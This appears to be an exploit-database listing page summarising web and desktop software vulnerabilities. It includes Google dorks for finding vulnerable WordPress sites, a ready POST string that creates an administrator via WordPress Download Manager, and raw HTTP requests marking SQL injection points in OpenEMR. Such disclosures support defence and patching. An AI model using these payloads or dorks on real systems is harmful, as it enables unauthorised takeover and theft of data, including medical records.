Explore Vulnerabilities

Explore all Exploits:

WordPress WP Symposium 14.11 Shell Upload Vulnerability

The upload function located at "/wp-symposium/server/file_upload_form.php" is protected; however, "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allows any extension. The same vulnerable files are located in "/wp-symposium/mobile-files/server/php/". Google dork: index of "wp-symposium"

ResourceSpace Multiple Cross Site Scripting, and HTML and SQL Injection Vulnerabilities

This web application is vulnerable to Cross Site Scripting (XSS). XSS is caused when an application echoes user-controllable input data back to the browser without first sanitising or escaping dangerous characters. Unescaped strings are then interpreted or executed by the browser as script, just as if they had originated from the web server. Malicious script is sent by the attacker via the vulnerable web application and executed in the victim's browser, within the context of that user, and may be used to steal session information, redirect users to a malicious site, and even steal credentials in a phishing attack.

phpMyAdmin Denial of Service Vulnerability

A vulnerability present in phpMyAdmin 4.0.x before 4.0.10.7, 4.1.x before 4.1.14.8, and 4.2.x before 4.2.13.1 allows remote attackers to cause a denial of service (resource consumption) via a long password.

PHPads Authentication Bypass Exploit

This exploit allows an attacker to bypass authentication and change the administrator password of a vulnerable PHPads installation. The exploit works by first retrieving the username and password from the ads.dat file, then using those credentials to access the admin.php?action=config page and change the password to 'htlover'.

WordPress Download Manager 2.7.0-2.7.4 Remote Command Execution

The vulnerable function is located in the "/download-manager/wpdm-core.php" file. Any user from any post/page can call the wpdm_ajax_call_exec() function (wp hook). wpdm_ajax_call_exec() calls functions via call_user_func() using POST data. Evil POST data (add new WordPress administrator): action=wpdm_ajax_call&execute=wp_insert_user&user_login=NewAdminUser&user_pass=NewAdminPassword&role=administrator. Google dork: index of "wordpress-download".

jaangle 0.98i.977 Denial of Service Vulnerability

A buffer overflow vulnerability exists in Jaangle 0.98i.977, which could allow an attacker to cause a denial of service condition. The vulnerability is due to a lack of proper validation of user-supplied input when handling specially crafted .m3u files. An attacker can exploit this vulnerability by creating a malicious .m3u file containing a large amount of data and sending it to the target system. Successful exploitation of this vulnerability could result in a denial of service condition.

Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)

A buffer overflow vulnerability exists in Mediacoder 0.8.33 build 5680 when a specially crafted .lst file is opened. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is due to the application not properly validating the length of user-supplied data before copying it to a fixed-length buffer. An attacker can exploit this vulnerability by enticing a user to open a specially crafted .lst file.

Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)

Mediacoder 0.8.33 build 5680 is vulnerable to a SEH buffer overflow exploit. The vulnerability is triggered when a specially crafted .m3u file is opened. The file contains a malicious URL with 845 A characters followed by 4 B characters, 4 C characters, and 60 D characters. When the file is opened, the SEH handler is overwritten and the application crashes.

Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit

The Soitec SmartEnergy web application suffers from an authentication bypass vulnerability via SQL injection in the login script. The script fails to sanitize the 'login' POST parameter, allowing the attacker to bypass the security mechanism and view sensitive information that can be further used in a social engineering attack.

Multiple Authenticated SQL Injections In OpenEMR

SQL injection has been found and confirmed within the software when acting as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from multiple SQL injections:

Request 1

POST /openemr/interface/super/edit_layout.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=nq2h24dbqlcgee1rlrk3ufutq7
[...]
Content-Length: 134

formaction=&deletefieldid=&deletefieldgroup=&deletegroupname=&movegroupname=&movedirection=&selectedfields=&targetgroup=&layout_id=HIS<SQL Injection>

Request 2

POST /openemr/interface/reports/prescriptions_report.php HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
[...]
Content-Length: 135

form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection>

Request 3

POST /openemr/interface/billing/edit_payment.php HTTP/1.1
Host: 192.168.56.102
[...]
Content-Length: 186
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en

CountIndexAbove=0&ActionStatus=&CountIndexBelow=0&after_value=&DeletePaymentDistributionId=&hidden_type_code=&ajax_mode=&payment_id=1<SQL Injection>&ParentPage=&hidden_patient_code=&global_amount=&mode=

Request 4

GET /openemr/interface/forms_admin/forms_admin.php?id=17<SQL Injection>&method=enable HTTP/1.1
Host: 192.168.56.102
[...]
Cookie: OpenEMR=lofk0gvs8h4ahj1fpq9g3tukk0
Connection: keep-alive

Request 5

POST /openemr/interface/billing/sl_eob_search.php HTTP/1.1
Host: 192.168.56.102
[...]
Content-Length: 135
Cookie: pma_collation_connection=utf8_general_ci; PHPSESSID=ijfh4vsb18o425oupgt278md56; pma_theme=original; OpenEMR=3j8g58403l71iohk70l1oif3b5; pma_lang=en

form_refresh=true&form_facility=&form_from_date=2014-01-01&form_to_date=2014-07-25&form_patient_id=1<SQL Injection>&form_drug_name=a<SQL Injection>&form_lot_number=1<SQL Injection>

Recent Exploits: